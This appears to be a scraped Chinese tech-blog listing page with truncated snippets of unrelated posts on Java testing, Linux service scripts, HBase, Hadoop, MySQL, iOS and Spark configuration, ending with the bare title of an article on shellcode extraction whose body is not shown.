表驱动法实例 bijian1013 java 表驱动法 TDD
获得月的天数是典型的直接访问驱动表方式的实例，下面我们来展示一下： MonthDaysTest.java package com.study.test; import org.junit.Assert; import org.junit.Test; import com.study.MonthDays; public class MonthDaysTest { @T
LInux启停重启常用服务器的脚本 bit1129 linux
启动，停止和重启常用服务器的Bash脚本，对于每个服务器，需要根据实际的安装路径做相应的修改 #! /bin/bash Servers=(Apache2, Nginx, Resin, Tomcat, Couchbase, SVN, ActiveMQ, Mongo); Ops=(Start, Stop, Restart); currentDir=$(pwd); echo
【HBase六】REST操作HBase bit1129 hbase
HBase提供了REST风格的服务方便查看HBase集群的信息，以及执行增删改查操作 1. 启动和停止HBase REST 服务 1.1 启动REST服务前台启动（默认端口号8080） [hadoop@hadoop bin]$ ./hbase rest start 后台启动 hbase-daemon.sh start rest 启动时指定
大话zabbix 3.0设计假设 ronin47
What’s new in Zabbix 2.0? 去年开始使用Zabbix的时候，是1.8.X的版本，今年Zabbix已经跨入了2.0的时代。看了2.0的release notes，和performance相关的有下面几个： :: Performance improvements::Trigger related da
http错误码大全 byalias http协议 javaweb
响应码由三位十进制数字组成，它们出现在由HTTP服务器发送的响应的第一行。响应码分五种类型，由它们的第一位数字表示： 1）1xx：信息，请求收到，继续处理 2）2xx：成功，行为被成功地接受、理解和采纳 3）3xx：重定向，为了完成请求，必须进一步执行的动作 4）4xx：客户端错误，请求包含语法错误或者请求无法实现 5）5xx：服务器错误，服务器不能实现一种明显无效的请求
J2EE设计模式-Intercepting Filter bylijinnan java 设计模式数据结构
Intercepting Filter类似于职责链模式有两种实现其中一种是Filter之间没有联系，全部Filter都存放在FilterChain中，由FilterChain来有序或无序地把把所有Filter调用一遍。没有用到链表这种数据结构。示例如下： package com.ljn.filter.custom; import java.util.ArrayList;
修改jboss端口 chicony jboss
修改jboss端口 %JBOSS_HOME%\server\{服务实例名}\conf\bindingservice.beans\META-INF\bindings-jboss-beans.xml 中找到 <!-- The ports-default bindings are obtained by taking the base bindin
c++ 用类模版实现数组类 CrazyMizzz C++
最近c++学到数组类，写了代码将他实现，基本具有vector类的功能 #include<iostream> #include<string> #include<cassert> using namespace std; template<class T> class Array { public: //构造函数
hadoop dfs.datanode.du.reserved 预留空间配置方法 daizj hadoop 预留空间
对于datanode配置预留空间的方法为：在hdfs-site.xml添加如下配置 <property> <name>dfs.datanode.du.reserved</name> <value>10737418240</value>
mysql远程访问的设置 dcj3sjt126com mysql 防火墙
第一步: 激活网络设置你需要编辑mysql配置文件my.cnf. 通常状况，my.cnf放置于在以下目录： /etc/mysql/my.cnf (Debian linux) /etc/my.cnf （Red Hat Linux/Fedora Linux) /var/db/mysql/my.cnf (FreeBSD) 然后用vi编辑my.cnf，修改内容从以下行： [mysqld] 你所需要: 1
ios 使用特定的popToViewController返回到相应的Controller dcj3sjt126com controller
1、取navigationCtroller中的Controllers NSArray * ctrlArray = self.navigationController.viewControllers; 2、取出后，执行， [self.navigationController popToViewController:[ctrlArray objectAtIndex:0] animated:YES
Linux正则表达式和通配符的区别 eksliang 正则表达式通配符和正则表达式的区别通配符
转载请出自出处：http://eksliang.iteye.com/blog/1976579 首先得明白二者是截然不同的通配符只能用在shell命令中,用来处理字符串的的匹配。判断一个命令是否为bash shell(linux 默认的shell)的内置命令 type -t commad 返回结果含义 file 表示为外部命令 alias 表示该
Ubuntu Mysql Install and CONF gengzg Install
http://www.navicat.com.cn/download/navicat-for-mysql Step1: 下载Navicat ，网址：http://www.navicat.com/en/download/download.html Step2：进入下载目录，解压压缩包：tar -zxvf navicat11_mysql_en.tar.gz
批处理，删除文件bat huqiji windows dos
@echo off ::演示：删除指定路径下指定天数之前（以文件名中包含的日期字符串为准）的文件。 ::如果演示结果无误，把del前面的echo去掉，即可实现真正删除。 ::本例假设文件名中包含的日期字符串（比如：bak-2009-12-25.log） rem 指定待删除文件的存放路径 set SrcDir=C:/Test/BatHome rem 指定天数 set DaysAgo=1
跨浏览器兼容的HTML5视频音频播放器天梯梦 html5
HTML5的video和audio标签是用来在网页中加入视频和音频的标签，在支持html5的浏览器中不需要预先加载Adobe Flash浏览器插件就能轻松快速的播放视频和音频文件。而html5media.js可以在不支持html5的浏览器上使video和audio标签生效。 How to enable <video> and <audio> tags in
Bundle自定义数据传递 hm4123660 android Serializable 自定义数据传递 Bundle Parcelable
我们都知道Bundle可能过put****()方法添加各种基本类型的数据，Intent也可以通过putExtras(Bundle)将数据添加进去，然后通过startActivity()跳到下一下Activity的时候就把数据也传到下一个Activity了。如传递一个字符串到下一个Activity 把数据放到Intent
C＃：异步编程和线程的使用（.NET 4.5 ） powertoolsteam .net 线程 C#异步编程
异步编程和线程处理是并发或并行编程非常重要的功能特征。为了实现异步编程，可使用线程也可以不用。将异步与线程同时讲，将有助于我们更好的理解它们的特征。本文中涉及关键知识点 1. 异步编程 2. 线程的使用 3. 基于任务的异步模式 4. 并行编程 5. 总结异步编程什么是异步操作？异步操作是指某些操作能够独立运行，不依赖主流程或主其他处理流程。通常情况下，C＃程序
spark 查看 job history 日志 Stark_Summer 日志 spark history job
SPARK_HOME/conf 下: spark-defaults.conf 增加如下内容 spark.eventLog.enabled true spark.eventLog.dir hdfs://master:8020/var/log/spark spark.eventLog.compress true spark-env.sh 增加如下内容 export SP
SSH框架搭建 wangxiukai2015eye spring Hibernate struts
MyEclipse搭建SSH框架 Struts Spring Hibernate 1、new一个web project。 2、右键项目，为项目添加Struts支持。选择Struts2 Core Libraries -<MyEclipes-Library> 点击Finish。src目录下多了struts

基本shellcode提取方法

你可能感兴趣的:(linux,汇编,function,gcc,null,代码分析)